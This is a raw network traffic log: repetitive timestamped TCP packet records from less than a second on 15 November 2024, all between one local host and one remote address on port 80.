Nov 15, 2024 10:35:56.808722973 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.808758020 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.808793068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.808813095 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.808826923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.808872938 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.808955908 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.809113026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.809154987 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.827358007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.827390909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.827424049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.827434063 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.837852001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.837924004 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.837941885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.837975025 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.838020086 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.858390093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.858444929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.858483076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.858516932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.858551979 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.858587027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.858594894 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.858594894 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.858634949 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.898840904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.898900032 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.898988008 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.899018049 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.926162958 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.926218987 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.926259041 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.926340103 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.926341057 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.944545031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.944581985 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.944617987 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.944636106 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.944652081 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.944705963 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.944793940 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.944888115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.944997072 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.955039024 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.955073118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.955106020 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.955142021 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.975182056 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.975224018 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.975255966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.975255013 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.975291967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.975303888 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.975522041 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:56.975578070 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:56.975598097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.017374992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.017411947 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.017446995 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.017468929 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.017505884 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.043400049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.043433905 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.043466091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.043492079 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.061928988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.061966896 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.062000990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.062024117 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.062035084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.062041998 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.062069893 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.065037012 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.072803020 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.072839022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.072871923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.072901964 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.094765902 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.094846964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.094844103 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.094882011 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.094917059 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.094937086 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.094952106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.095005989 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.132975101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.133008957 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.133042097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.133085012 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.160049915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.160197973 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.160228968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.160268068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.160286903 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.160303116 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.160320997 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.160341024 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.160357952 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.178900003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.178966045 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.179006100 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.179038048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.179049969 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.179075003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.179089069 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.179106951 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.179155111 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.189474106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.189524889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.189591885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.189613104 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.191621065 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.209723949 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.209847927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.209892035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.209923983 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.209939957 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.209989071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.210005045 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.250169992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.250237942 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.250276089 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.250370026 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.277242899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.277260065 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.277440071 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.277456999 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.277518988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.277535915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.277550936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.277585030 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.277611971 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.295897007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.295919895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.295938969 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.296103954 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.306468010 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.306493998 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.306515932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.306566954 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.306574106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.306595087 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.306596994 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.306615114 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.306648016 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.326791048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.326822996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.326843977 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.326862097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.326881886 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.326889038 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.326889038 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.326940060 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.367584944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.367608070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.367624044 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.367669106 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.394459963 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.394503117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.394561052 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.394597054 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.394633055 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.394655943 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.394655943 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.394669056 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.394735098 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.413180113 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.413218975 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.413254976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.413289070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.413384914 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.413386106 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.423655033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.423707962 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.423728943 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.423744917 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.423779011 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.423800945 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.423814058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.423871994 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.444068909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.444116116 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.444152117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.444185019 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.444226027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.444257975 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.444295883 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.484658003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.484700918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.484735012 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.484767914 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.484803915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.484818935 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.484818935 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.484870911 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.511723042 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.511770964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.511806011 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.511841059 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.511869907 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.511878967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.511904001 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.530550003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.530595064 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.530618906 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.530635118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.530694008 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.540836096 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.540880919 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.540945053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.540955067 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.540981054 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.541026115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.541038036 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.541148901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.541629076 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.562638044 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.562685013 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.562720060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.562746048 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.562756062 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.562793016 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.562799931 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.602612019 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.602660894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.602679014 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.602694035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.602710009 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.602711916 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.602757931 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.602777004 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.628741026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.628788948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.628824949 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.628844023 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.628859997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.628896952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.628911972 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.647361994 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.647465944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.647497892 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.647505045 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.647610903 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.657741070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.657941103 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.657973051 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.658005953 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.658006907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.658042908 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.658077955 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.658101082 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.658144951 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.679543018 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.679568052 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.679585934 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.679631948 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.679666996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.679683924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.679699898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.679723024 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.679771900 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.719824076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.719865084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.719902039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.719930887 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.719942093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.720000982 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.720002890 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.720196962 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.720230103 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.720285892 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.720292091 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.720324039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.720379114 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.745626926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.745666981 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.745697975 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.745707989 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.745778084 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.745795965 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.745831966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.745866060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.745908022 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.764576912 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.764611959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.764781952 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.774956942 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.775005102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.775023937 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.775047064 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.775088072 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.775401115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.775418043 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.775434017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.775460958 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.796936035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.796957970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.796973944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.797017097 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.797017097 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.797167063 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.797183990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.797199011 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.797245979 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.836999893 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.837069988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.837074041 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.837089062 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.837152004 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.837224007 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.837241888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.837291002 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.837455988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.837472916 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.837491035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.837546110 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.863370895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.863395929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.863413095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.863429070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.863442898 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.863445997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.863500118 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.863500118 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.881735086 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.881752968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.881767988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.881810904 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.892180920 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.892198086 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.892213106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.892251015 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.892286062 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.892540932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.892556906 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.892573118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:57.892608881 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:57.930321932 CET	80	49741	150.241.95.163	192.168.2.6
